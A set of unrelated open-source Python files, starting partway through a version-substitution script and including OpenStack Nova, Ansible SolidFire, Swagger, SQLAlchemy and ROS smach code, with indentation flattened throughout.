-f FILE, --file=FILE Read variables from FILE.
-i FILE, --input=FILE Read strings to substitute from FILE.
-o FILE, --output=FILE Write substituted strings to FILE.
-t TEMPLATE, --template=TEMPLATE Use TEMPLATE as the strings to substitute.
-e VAR=VAL, --eval=VAR=VAL Evaluate VAL after reading variables. Can
be used to synthesize variables. e.g.
-e 'PATCH_HI=int(PATCH)/256'.
-h, --help Print this help and exit.
"""
evals = {}
variable_files = []
in_file = None
out_file = None
template = None
try:
try:
opts, args = getopt.getopt(argv[1:], short_options, long_options)
except getopt.error, msg:
raise Usage(msg)
for o, a in opts:
if o in ('-e', '--eval'):
try:
evals.update(dict([a.split('=',1)]))
except ValueError:
raise Usage("-e requires VAR=VAL")
elif o in ('-f', '--file'):
variable_files.append(a)
elif o in ('-i', '--input'):
in_file = a
elif o in ('-o', '--output'):
out_file = a
elif o in ('-t', '--template'):
template = a
elif o in ('-h', '--help'):
print helpstr
return 0
    while len(args) and (in_file is None or out_file is None):
if in_file is None:
in_file = args.pop(0)
elif out_file is None:
out_file = args.pop(0)
if args:
msg = 'Unexpected arguments: %r' % args
raise Usage(msg)
except Usage, err:
sys.stderr.write(err.msg)
sys.stderr.write('; Use -h to get help.\n')
return 2
values = fetch_values(variable_files)
for key, val in evals.iteritems():
values[key] = str(eval(val, globals(), values))
if template is not None:
contents = subst_template(template, values)
elif in_file:
contents = subst_file(in_file, values)
else:
# Generate a default set of version information.
contents = """MAJOR=%(MAJOR)s
MINOR=%(MINOR)s
BUILD=%(BUILD)s
PATCH=%(PATCH)s
LASTCHANGE=%(LASTCHANGE)s
OFFICIAL_BUILD=%(OFFICIAL_BUILD)s
""" % values
if out_file:
write_if_changed(out_file, contents)
else:
print contents
return 0
if __name__ == '__main__':
sys.exit(main())
|
import argparse, logging, codecs
from nltk.translate.bleu_score import sentence_bleu as bleu
from nltk.corpus import stopwords
stopw = set(stopwords.words('english'))
def setup_args():
parser = argparse.ArgumentParser()
parser.add_argument('out1', help = 'Output 1')
parser.add_argument('out2', help = 'Output 2')
parser.add_argument('input', help = 'Input')
parser.add_argument('output', help='Selected Output')
args = parser.parse_args()
return args
def get_scores(candidate1, candidate2, input):
#score_1 = bleu([input.split()], candidate1.split(), weights=(1.0,))
#score_2 = bleu([input.split()], candidate2.split(), weights=(1.0,))
input_kw = set(input.split()) - stopw
kw1 = set(candidate1.split()) - stopw
kw2 = set(candidate2.split()) - stopw
match1 = kw1.intersection(input_kw)
match2 = kw2.intersection(input_kw)
return len(match1), len(match2)
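# Illustrative example (hypothetical sentences): for the input
# "how do you reset your password", candidate1 "click reset password" and
# candidate2 "thanks a lot", the non-stopword keyword overlaps with the input
# are 2 and 0, so get_scores() returns (2, 0) and candidate1 would be picked.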
def main():
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
args = setup_args()
logging.info(args)
out1_lines = codecs.open(args.out1, 'r', 'utf-8').readlines()
out2_lines = codecs.open(args.out2, 'r', 'utf-8').readlines()
picked_num1 = 0
picked_num2 = 0
    input_lines = codecs.open(args.input, 'r', 'utf-8').readlines()
fw = codecs.open(args.output, 'w', 'utf-8')
for index, (out1, out2, input) in enumerate(zip(out1_lines, out2_lines, input_lines)):
q2 = input.split('END')[2]
score_1, score_2 = get_scores(out1, out2, q2)
        logging.info('Index: %d score1: %d score2: %d' % (index, score_1, score_2))
if score_1 >= score_2:
picked_out = out1
picked_num1 += 1
else:
picked_out = out2
picked_num2 +=1
fw.write(picked_out.strip() + '\n')
    logging.info('Picked1: %d Picked2: %d' % (picked_num1, picked_num2))
if __name__ == '__main__':
main()
|
# Copyright 2011 OpenStack Foundation
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
ALIAS = "os-lock-server"
def authorize(context, action_name):
action = 'v3:%s:%s' % (ALIAS, action_name)
extensions.extension_authorizer('compute', action)(context)
class LockServerController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(LockServerController, self).__init__(*args, **kwargs)
self.compute_api = compute.API()
@wsgi.response(202)
@extensions.expected_errors(404)
@wsgi.action('lock')
def _lock(self, req, id, body):
"""Lock a server instance."""
context = req.environ['nova.context']
authorize(context, 'lock')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
self.compute_api.lock(context, instance)
@wsgi.response(202)
@extensions.expected_errors(404)
@wsgi.action('unlock')
def _unlock(self, req, id, body):
"""Unlock a server instance."""
context = req.environ['nova.context']
authorize(context, 'unlock')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
self.compute_api.unlock(context, instance)
class LockServer(extensions.V3APIExtensionBase):
"""Enable lock/unlock server actions."""
name = "LockServer"
alias = ALIAS
version = 1
def get_controller_extensions(self):
controller = LockServerController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
def get_resources(self):
return []
|
# coding: utf-8
"""
OpenAPI spec version:
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1GitSourceRevision(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
operations = [
]
# The key is attribute name
# and the value is attribute type.
swagger_types = {
'commit': 'str',
'author': 'V1SourceControlUser',
'committer': 'V1SourceControlUser',
'message': 'str'
}
# The key is attribute name
# and the value is json key in definition.
attribute_map = {
'commit': 'commit',
'author': 'author',
'committer': 'committer',
'message': 'message'
}
def __init__(self, commit=None, author=None, committer=None, message=None):
"""
V1GitSourceRevision - a model defined in Swagger
"""
self._commit = commit
self._author = author
self._committer = committer
self._message = message
@property
def commit(self):
"""
Gets the commit of this V1GitSourceRevision.
Commit is the commit hash identifying a specific commit
:return: The commit of this V1GitSourceRevision.
:rtype: str
"""
return self._commit
@commit.setter
def commit(self, commit):
"""
Sets the commit of this V1GitSourceRevision.
Commit is the commit hash identifying a specific commit
:param commit: The commit of this V1GitSourceRevision.
:type: str
"""
self._commit = commit
@property
def author(self):
"""
Gets the author of this V1GitSourceRevision.
Author is the author of a specific commit
:return: The author of this V1GitSourceRevision.
:rtype: V1SourceControlUser
"""
return self._author
@author.setter
def author(self, author):
"""
Sets the author of this V1GitSourceRevision.
Author is the author of a specific commit
:param author: The author of this V1GitSourceRevision.
:type: V1SourceControlUser
"""
self._author = author
@property
def committer(self):
"""
Gets the committer of this V1GitSourceRevision.
Committer is the committer of a specific commit
:return: The committer of this V1GitSourceRevision.
:rtype: V1SourceControlUser
"""
return self._committer
@committer.setter
def committer(self, committer):
"""
Sets the committer of this V1GitSourceRevision.
Committer is the committer of a specific commit
:param committer: The committer of this V1GitSourceRevision.
:type: V1SourceControlUser
"""
self._committer = committer
@property
def message(self):
"""
Gets the message of this V1GitSourceRevision.
Message is the description of a specific commit
:return: The message of this V1GitSourceRevision.
:rtype: str
"""
return self._message
@message.setter
def message(self, message):
"""
Sets the message of this V1GitSourceRevision.
Message is the description of a specific commit
:param message: The message of this V1GitSourceRevision.
:type: str
"""
self._message = message
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(V1GitSourceRevision.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
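# Illustrative usage sketch (in real API responses the author/committer fields
# hold V1SourceControlUser instances; they are left unset here to keep the
# sketch self-contained):
#
#     rev = V1GitSourceRevision(commit='abc123', message='Initial commit')
#     rev.to_dict()
#     # -> {'commit': 'abc123', 'author': None, 'committer': None, 'message': 'Initial commit'}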
|
#!/usr/bin/python
# (c) 2017, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: sf_volume_access_group_manager
short_description: Manage SolidFire Volume Access Groups
extends_documentation_fragment:
- netapp.solidfire
version_added: '2.3'
author: Sumit Kumar ([email protected])
description:
- Create, destroy, or update volume access groups on SolidFire
options:
state:
description:
- Whether the specified volume access group should exist or not.
required: true
choices: ['present', 'absent']
name:
description:
- Name of the volume access group. It is not required to be unique, but recommended.
required: true
initiators:
description:
- List of initiators to include in the volume access group. If unspecified, the access group will start out without configured initiators.
required: false
default: None
volumes:
description:
- List of volumes to initially include in the volume access group. If unspecified, the access group will start without any volumes.
required: false
default: None
virtual_network_id:
description:
- The ID of the SolidFire Virtual Network ID to associate the volume access group with.
required: false
default: None
virtual_network_tags:
description:
- The ID of the VLAN Virtual Network Tag to associate the volume access group with.
required: false
default: None
attributes:
description: List of Name/Value pairs in JSON object format.
required: false
default: None
volume_access_group_id:
description:
- The ID of the volume access group to modify or delete.
required: false
default: None
'''
EXAMPLES = """
- name: Create Volume Access Group
sf_volume_access_group_manager:
hostname: "{{ solidfire_hostname }}"
username: "{{ solidfire_username }}"
password: "{{ solidfire_password }}"
state: present
name: AnsibleVolumeAccessGroup
volumes: [7,8]
- name: Modify Volume Access Group
sf_volume_access_group_manager:
hostname: "{{ solidfire_hostname }}"
username: "{{ solidfire_username }}"
password: "{{ solidfire_password }}"
state: present
volume_access_group_id: 1
name: AnsibleVolumeAccessGroup-Renamed
attributes: {"volumes": [1,2,3], "virtual_network_id": 12345}
- name: Delete Volume Access Group
sf_volume_access_group_manager:
hostname: "{{ solidfire_hostname }}"
username: "{{ solidfire_username }}"
password: "{{ solidfire_password }}"
state: absent
volume_access_group_id: 1
"""
RETURN = """
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
HAS_SF_SDK = netapp_utils.has_sf_sdk()
class SolidFireVolumeAccessGroup(object):
def __init__(self):
self.argument_spec = netapp_utils.ontap_sf_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent']),
name=dict(required=True, type='str'),
volume_access_group_id=dict(required=False, type='int', default=None),
initiators=dict(required=False, type='list', default=None),
volumes=dict(required=False, type='list', default=None),
virtual_network_id=dict(required=False, type='list', default=None),
virtual_network_tags=dict(required=False, type='list', default=None),
attributes=dict(required=False, type='dict', default=None),
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
supports_check_mode=True
)
p = self.module.params
# set up state variables
self.state = p['state']
self.name = p['name']
self.volume_access_group_id = p['volume_access_group_id']
self.initiators = p['initiators']
self.volumes = p['volumes']
self.virtual_network_id = p['virtual_network_id']
self.virtual_network_tags = p['virtual_network_tags']
self.attributes = p['attributes']
if HAS_SF_SDK is False:
self.module.fail_json(msg="Unable to import the SolidFire Python SDK")
else:
self.sfe = netapp_utils.create_sf_connection(module=self.module)
def get_volume_access_group(self):
access_groups_list = self.sfe.list_volume_access_groups()
for group in access_groups_list.volume_access_groups:
if group.name == self.name:
# Update self.volume_access_group_id:
if self.volume_access_group_id is not None:
if group.volume_access_group_id == self.volume_access_group_id:
return group
else:
self.volume_access_group_id = group.volume_access_group_id
return group
return None
def create_volume_access_group(self):
try:
self.sfe.create_volume_access_group(name=self.name,
initiators=self.initiators,
volumes=self.volumes,
virtual_network_id=self.virtual_network_id,
virtual_network_tags=self.virtual_network_tags,
attributes=self.attributes)
except Exception as e:
self.module.fail_json(msg="Error creating volume access group %s: %s" %
(self.name, to_native(e)), exception=traceback.format_exc())
def delete_volume_access_group(self):
try:
self.sfe.delete_volume_access_group(volume_access_group_id=self.volume_access_group_id)
except Exception as e:
self.module.fail_json(msg="Error deleting volume access group %s: %s" %
(self.volume_access_group_id, to_native(e)),
exception=traceback.format_exc())
def update_volume_access_group(self):
try:
self.sfe.modify_volume_access_group(volume_access_group_id=self.volume_access_group_id,
virtual_network_id=self.virtual_network_id,
virtual_network_tags=self.virtual_network_tags,
name=self.name,
initiators=self.initiators,
volumes=self.volumes,
attributes=self.attributes)
except Exception as e:
self.module.fail_json(msg="Error updating volume access group %s: %s" %
(self.volume_access_group_id, to_native(e)), exception=traceback.format_exc())
def apply(self):
changed = False
group_exists = False
update_group = False
group_detail = self.get_volume_access_group()
if group_detail:
group_exists = True
if self.state == 'absent':
changed = True
elif self.state == 'present':
# Check if we need to update the group
if self.volumes is not None and group_detail.volumes != self.volumes:
update_group = True
changed = True
elif self.initiators is not None and group_detail.initiators != self.initiators:
update_group = True
changed = True
elif self.virtual_network_id is not None or self.virtual_network_tags is not None or \
self.attributes is not None:
update_group = True
changed = True
else:
if self.state == 'present':
changed = True
if changed:
if self.module.check_mode:
pass
else:
if self.state == 'present':
if not group_exists:
self.create_volume_access_group()
elif update_group:
self.update_volume_access_group()
elif self.state == 'absent':
self.delete_volume_access_group()
self.module.exit_json(changed=changed)
def main():
v = SolidFireVolumeAccessGroup()
v.apply()
if __name__ == '__main__':
main()
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Matcher classes to be used inside of the testtools assertThat framework."""
import pprint
class DictKeysMismatch(object):
def __init__(self, d1only, d2only):
self.d1only = d1only
self.d2only = d2only
def describe(self):
return ('Keys in d1 and not d2: %(d1only)s.'
' Keys in d2 and not d1: %(d2only)s' %
{'d1only': self.d1only, 'd2only': self.d2only})
def get_details(self):
return {}
class DictMismatch(object):
def __init__(self, key, d1_value, d2_value):
self.key = key
self.d1_value = d1_value
self.d2_value = d2_value
def describe(self):
return ("Dictionaries do not match at %(key)s."
" d1: %(d1_value)s d2: %(d2_value)s" %
{'d1_value': self.d1_value, 'd2_value': self.d2_value})
def get_details(self):
return {}
class DictMatches(object):
def __init__(self, d1, approx_equal=False, tolerance=0.001):
self.d1 = d1
self.approx_equal = approx_equal
self.tolerance = tolerance
def __str__(self):
return 'DictMatches(%s)' % (pprint.pformat(self.d1))
# Useful assertions
def match(self, d2):
"""Assert two dicts are equivalent.
This is a 'deep' match in the sense that it handles nested
dictionaries appropriately.
NOTE:
If you don't care (or don't know) a given value, you can specify
the string DONTCARE as the value. This will cause that dict-item
to be skipped.
"""
d1keys = set(self.d1.keys())
d2keys = set(d2.keys())
if d1keys != d2keys:
d1only = d1keys - d2keys
d2only = d2keys - d1keys
return DictKeysMismatch(d1only, d2only)
for key in d1keys:
d1value = self.d1[key]
d2value = d2[key]
try:
error = abs(float(d1value) - float(d2value))
within_tolerance = error <= self.tolerance
except (ValueError, TypeError):
# If both values aren't convertible to float, just ignore
# ValueError if arg is a str, TypeError if it's something else
# (like None)
within_tolerance = False
if hasattr(d1value, 'keys') and hasattr(d2value, 'keys'):
matcher = DictMatches(d1value)
did_match = matcher.match(d2value)
if did_match is not None:
return did_match
elif 'DONTCARE' in (d1value, d2value):
continue
elif self.approx_equal and within_tolerance:
continue
elif d1value != d2value:
return DictMismatch(key, d1value, d2value)
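# Minimal usage sketch (assumes a testtools-style TestCase providing assertThat;
# the dictionaries are illustrative). DictMatches follows the matcher protocol:
# match() returns None on success and a mismatch object otherwise, and the
# string 'DONTCARE' skips comparison of that item:
#
#     self.assertThat({'a': 1, 'b': {'c': 99}},
#                     DictMatches({'a': 1, 'b': {'c': 'DONTCARE'}}))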
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
__author__ = 'RemiZOffAlex'
__copyright__ = '(c) RemiZOffAlex'
__license__ = 'MIT'
__email__ = '[email protected]'
__url__ = 'http://remizoffalex.ru'
import datetime
from sqlalchemy import Table, Column, Boolean, Integer, ForeignKey, String, DateTime, Float
from sqlalchemy.orm import relationship
from . import Base
class TrashClient(Base):
"""
    Recycle bin for clients
"""
__tablename__ = "trashclient"
id = Column(Integer, primary_key=True)
    # User ID
user_id = Column(Integer, ForeignKey('user.id'))
    # Client ID
client_id = Column(Integer, ForeignKey('client.id'))
    # Deletion date
created = Column(DateTime)
    # Relationships
user = relationship("User", primaryjoin="TrashClient.user_id==User.id")
client = relationship("Client", primaryjoin="TrashClient.client_id==Client.id")
def __init__(self, user, client):
        assert type(user).__name__ == 'User', 'A User object was not passed'
        assert type(client).__name__ == 'Client', 'A Client object was not passed'
self.user_id = user.id
self.client_id = client.id
self.created = datetime.datetime.utcnow()
|
#!/usr/bin/env python
import roslib
import rospy
import smach
import smach_ros
from geometry_msgs.msg import Point
from geometry_msgs.msg import Point32
from geometry_msgs.msg import PointStamped
from geometry_msgs.msg import Pose
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import Quaternion
from geometry_msgs.msg import PoseArray
from sensor_msgs.msg import PointCloud
from sensor_msgs import point_cloud2 as pc2
from sensor_msgs.msg import PointCloud2
from sensor_msgs.point_cloud2 import create_cloud_xyz32
import threading
def parse_pointstamped(point_input):
"""
Parse point_input into PointStamped.
"""
try:
assert isinstance(point_input, PointStamped)
return point_input
except:
pass
try:
assert isinstance(point_input, Point)
point = PointStamped(point = point_input)
point.header.stamp = rospy.Time.now()
return point
except:
pass
try:
assert isinstance(point_input, Point32)
point = PointStamped(point = Point(x=point_input.x, y=point_input.y, z=point_input.z))
point.header.stamp = rospy.Time.now()
return point
except:
pass
try:
point = point_input
point = PointStamped(point = Point(x=point[0], y=point[1], z=point[2]))
point.header.stamp = rospy.Time.now()
return point
except Exception as e:
raise ValueError('Point not properly specified (should be Point, PointStamped or [3] list type)!')
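# Illustrative examples of the inputs parse_pointstamped() accepts (a running
# rospy node is assumed, since rospy.Time.now() is used to stamp the result):
#
#     parse_pointstamped(PointStamped(point=Point(x=1.0, y=2.0, z=3.0)))
#     parse_pointstamped(Point(x=1.0, y=2.0, z=3.0))
#     parse_pointstamped(Point32(x=1.0, y=2.0, z=3.0))
#     parse_pointstamped([1.0, 2.0, 3.0])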
def parse_posestamped(pose_input):
"""
Parse pose_input into PoseStamped.
"""
try:
assert isinstance(pose_input, PoseStamped)
return pose_input
except:
pass
try:
assert isinstance(pose_input, Pose)
pose = PoseStamped(pose = pose_input)
pose.header.stamp = rospy.Time.now()
return pose
except:
pass
try:
pose = pose_input
position = Point(x=pose_input[0][0], y=pose_input[0][1], z=pose_input[0][2])
orientation = Quaternion(x=pose_input[1][0], y=pose_input[1][1], z=pose_input[1][2], w=pose_input[1][3])
pose = PoseStamped(pose = Pose(position=position, orientation=orientation))
pose.header.stamp = rospy.Time.now()
return pose
except Exception as e:
raise ValueError('Pose not properly specified (should be Pose, PoseStamped or [[3],[4]] list)!')
def parse_posearray(posearray_input):
"""
Parse posearray_input into a PoseArray.
"""
try:
assert isinstance(posearray_input, PoseArray)
return posearray_input
except:
pass
try:
assert isinstance(posearray_input, list)
posearray = PoseArray()
for pose in posearray_input:
try:
assert isinstance(pose, Pose)
posearray.poses.append(pose)
continue
except:
pass
try:
assert isinstance(pose, PoseStamped)
posearray.poses.append(pose.pose)
continue
except:
pass
try:
position = Point(x=pose[0][0], y=pose[0][1], z=pose[0][2])
orientation = Quaternion(x=pose[1][0], y=pose[1][1], z=pose[1][2], w=pose[1][3])
pose = Pose(position=position, orientation=orientation)
posearray.poses.append(pose)
continue
except Exception as e:
raise ValueError('Pose in pose array input not properly specified (should be Pose, PoseStamped or [[3],[4]] list)!')
posearray.header.stamp = rospy.Time.now()
return posearray
except Exception as e:
raise ValueError('Pose array not properly specified (should be PoseArray or list of Pose, PoseStamped or [[3],[4]] list types)!')
def parse_pointcloud(pointcloud_input):
"""
Parse pointcloud_input into PointCloud.
"""
try:
assert isinstance(pointcloud_input, PointCloud)
return pointcloud_input
except:
pass
try:
points = pc2.read_points(pointcloud_input, skip_nans=True, field_names=('x', 'y', 'z'))
return PointCloud(points = map(lambda point: Point32(*point), points))
except Exception as e:
raise ValueError('Point cloud not properly specified (should be PointCloud or PointCloud2 type): ' + repr(e))
def parse_pointcloud2(pointcloud_input):
"""
Parse pointcloud_input into PointCloud2.
"""
try:
assert isinstance(pointcloud_input, PointCloud2)
return pointcloud_input
except:
pass
try:
points = [[point.x, point.y, point.z] for point in pointcloud_input.points]
pointcloud2 = create_cloud_xyz32(header=pointcloud_input.header, points=points)
return pointcloud2
except:
raise ValueError('Point cloud not properly specified (should be PointCloud or PointCloud2 type)!')
class MsgPublisher(object):
"""
"""
def __init__(self):
# A dict of message publishers indexed by topic
self._pubs = dict()
# A dict of messages indexed by topic
self._msgs = dict()
# A dict of callbacks indexed by topic
self._callbacks = dict()
# A dict of message publication rates indexed by topic
self._pub_rates = dict()
# A dict of message publisher threads indexed by topic
self._pub_threads = dict()
# A dict of message publisher stop flags indexed by topic
self._stop_flags = dict()
# Length of timeout (in seconds) for waiting for the threads to finish
# publishing before forcibly unpublishing.
self._unpublish_timeout = 10.0
def _run_pub_thread(self, topic):
r = rospy.Rate(self._pub_rates[topic])
while not self._stop_flags[topic]:
# Apply callback to message
if self._callbacks[topic]:
try:
self._msgs[topic] = self._callbacks[topic](self._msgs[topic])
except Exception as e:
rospy.logerr('Error when applying callback to message being published on topic {}: {}'.format(topic, repr(e)))
# Publish message
try:
self._pubs[topic].publish(self._msgs[topic])
except Exception as e:
rospy.logerr('Error while publishing to topic {}: {}'.format(topic, repr(e)))
r.sleep()
self._unpublish(topic)
def _unpublish(self, topic):
try:
self._pubs[topic].unregister()
except Exception as e:
rospy.logerr('Failed to unregister publisher of topic {}: {}'.format(topic, repr(e)))
raise
del self._pubs[topic]
del self._msgs[topic]
del self._callbacks[topic]
del self._pub_rates[topic]
def start(self, msg, topic, rate, frame_id=None, callback=None):
# Set the message publisher stopping flag
self._stop_flags[topic] = False
# Save the message
self._msgs[topic] = msg
# Save the message publication rate
self._pub_rates[topic] = rate
# Use frame_id if specified
if frame_id:
try:
assert(isinstance(frame_id, str))
self._msgs[topic].header.frame_id = frame_id
            except Exception as e:
rospy.logwarn('Failed to add specified frame_id {} to message for publication on topic {}: {}'.format(frame_id, topic, repr(e)))
# Use callback if specified
if callback:
try:
assert(callable(callback))
self._callbacks[topic] = callback
            except Exception as e:
rospy.logwarn('Failed to add specified callback {} to publisher of topic {}: {}'.format(callback, topic, repr(e)))
self._callbacks[topic] = None
else:
self._callbacks[topic] = None
# Add publisher
try:
self._pubs[topic] = rospy.Publisher(topic, type(self._msgs[topic]))
except Exception as e:
del self._pub_rates[topic]
            del self._msgs[topic]
rospy.logwarn('Failed to add publisher for topic {}: {}'.format(topic, repr(e)))
return 'aborted'
# Spin up the message publication thread
self._pub_threads[topic] = threading.Thread(target=self._run_pub_thread, args=[topic])
self._pub_threads[topic].start()
return 'succeeded'
def stop(self, topic):
# Signal thread to stop publishing
self._stop_flags[topic] = True
# Wait for the topic to be unpublished
t = rospy.get_time()
r = rospy.Rate(self._pub_rates[topic])
while topic in list(self._pubs.keys()):
if rospy.get_time() - t < self._unpublish_timeout:
r.sleep()
else:
break
else:
return 'succeeded'
# If the publisher is still running, issue a warning and attempt forced unpublish.
rospy.logwarn('Warning: timeout exceeded for stopping publisher thread for topic {}. Attempting forced stop...'.format(topic))
try:
self._unpublish(topic)
except Exception as e:
rospy.logerr('Error during forced stop of publisher of topic {}: {}'.format(topic, repr(e)))
return 'aborted'
return 'succeeded'
def stop_all(self):
# Stop all current publishers
for topic in self._pubs.keys():
if self.stop(topic) != 'succeeded':
return 'aborted'
return 'succeeded'
class PublishMsgState(smach.State):
def __init__(self, name, msg_publisher, action, input_keys = ['msg', 'topic', 'rate'], output_keys = ['msg', 'topic'], callbacks = None):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded', 'aborted'])
# Save the state name
self._name = name
# Save the MsgPublisherObserver object reference
self._msg_publisher = msg_publisher
# Save the action
self._action = action
# Set up dict of parsing functions for certain message types/classes.
self._msg_parsers = {"<class 'geometry_msgs.msg._Point.Point'>": parse_pointstamped,
"<class 'geometry_msgs.msg._PointStamped.PointStamped'>": parse_pointstamped,
"<class 'geometry_msgs.msg._Pose.Pose'>": parse_posestamped,
"<class 'geometry_msgs.msg._PoseStamped.PoseStamped'>": parse_posestamped,
"<class 'geometry_msgs.msg._PoseArray.PoseArray'>": parse_posearray,
"<class 'sensor_msgs.msg._PointCloud.PointCloud'>": parse_pointcloud,
"<class 'sensor_msgs.msg._PointCloud2.PointCloud2'>": parse_pointcloud2}
self._cbs = []
if callbacks:
for cb in sorted(callbacks):
if cb in globals():
self._cbs.append(globals()[cb])
elif cb in locals():
self._cbs.append(locals()[cb])
elif cb in dir(self):
self._cbs.append(getattr(self, cb))
self._cb_input_keys = []
self._cb_output_keys = []
self._cb_outcomes = []
for cb in self._cbs:
if cb and smach.has_smach_interface(cb):
self._cb_input_keys.append(cb.get_registered_input_keys())
self._cb_output_keys.append(cb.get_registered_output_keys())
self._cb_outcomes.append(cb.get_registered_outcomes())
self.register_input_keys(self._cb_input_keys[-1])
self.register_output_keys(self._cb_output_keys[-1])
self.register_outcomes(self._cb_outcomes[-1])
def _parse_msg(self, msg, msg_type=None):
# First try using a known parser for a specified msg_type.
try:
assert msg_type
msg_class = str(roslib.message.get_message_class(msg_type))
published_msg = self._msg_parsers[msg_class](msg)
return published_msg
except:
pass
# Next, try to select a known parser by checking the type of message.
try:
msg_class = str(type(msg))
published_msg = self._msg_parsers[msg_class](msg)
return published_msg
except:
pass
# Next, try each message type parser in succession and see if something sticks.
for _, parser in self._msg_parsers.items():
try:
published_msg = parser(msg)
return published_msg
except:
pass
# Finally, if none of the above stuck, just return the original message.
return msg
def execute(self, userdata):
# Call callbacks
for (cb, ik, ok) in zip(self._cbs,
self._cb_input_keys,
self._cb_output_keys):
# Call callback with limited userdata
try:
cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
except:
cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
# Start or stop the message publisher
outcome = 'aborted'
if self._action == 'start':
# Parse msg
try:
if 'msg_type' in self._input_keys:
published_msg = self._parse_msg(userdata.msg, msg_type=userdata.msg_type)
else:
published_msg = self._parse_msg(userdata.msg)
except Exception as e:
                rospy.logerr('Failed to parse message: {}'.format(repr(e)))
return 'aborted'
# Get topic if it's specified as an input key
if 'topic' in self._input_keys:
topic = userdata.topic
# Otherwise, construct it from the state name
else:
topic = 'smacha/' + self._name.lower()
# Get rate if it's specified as an input key
if 'rate' in self._input_keys:
rate = userdata.rate
else:
rate = 100.0
# Get callback if it's specified as an input key
if 'callback' in self._input_keys:
callback = userdata.callback
else:
callback = ''
# Get frame_id if it's specified as an input key
if 'frame_id' in self._input_keys:
frame_id = userdata.frame_id
else:
frame_id = ''
# Start the publisher
outcome = self._msg_publisher.start(published_msg, topic, rate, frame_id=frame_id, callback=callback)
elif self._action == 'stop':
            outcome = self._msg_publisher.stop(userdata.topic)
elif self._action == 'stop_all':
outcome = self._msg_publisher.stop_all()
# Set topic output key if specified
if self._action == 'start' and outcome == 'succeeded':
for output_key in ['topic', 'output_topic', 'topic_output']:
if output_key in self._output_keys:
setattr(userdata, output_key, topic)
# Set msg output key if specified
if self._action == 'start' and outcome == 'succeeded':
for output_key in ['msg', 'output_msg', 'msg_output']:
if output_key in self._output_keys:
setattr(userdata, output_key, published_msg)
return outcome
class SleepState(smach.State):
def __init__(self, time, input_keys = [], output_keys = [], callbacks = [], outcomes=['succeeded']):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=outcomes)
self._time = time
def execute(self, userdata):
rospy.sleep(self._time)
return 'succeeded'
def main():
rospy.init_node('sm')
msg_publisher = MsgPublisher()
sm = smach.StateMachine(outcomes=['succeeded', 'aborted'])
    sm.userdata.point = Point()
    sm.userdata.rate = 100.0
    sm.userdata.topic = 'smacha/rosbag_recording_1_point'
with sm:
smach.StateMachine.add('PUBLISH_MSG',
PublishMsgState('PUBLISH_MSG', msg_publisher, 'start'),
transitions={'aborted':'aborted',
'succeeded':'WAIT'},
remapping={'msg':'point',
'rate':'rate',
'topic':'topic'})
smach.StateMachine.add('WAIT',
SleepState(10),
transitions={'succeeded':'UNPUBLISH_MSG'})
smach.StateMachine.add('UNPUBLISH_MSG',
PublishMsgState('UNPUBLISH_MSG', msg_publisher, 'stop_all'),
transitions={'aborted':'aborted',
'succeeded':'succeeded'})
outcome = sm.execute()
if __name__ == '__main__':
main()
|
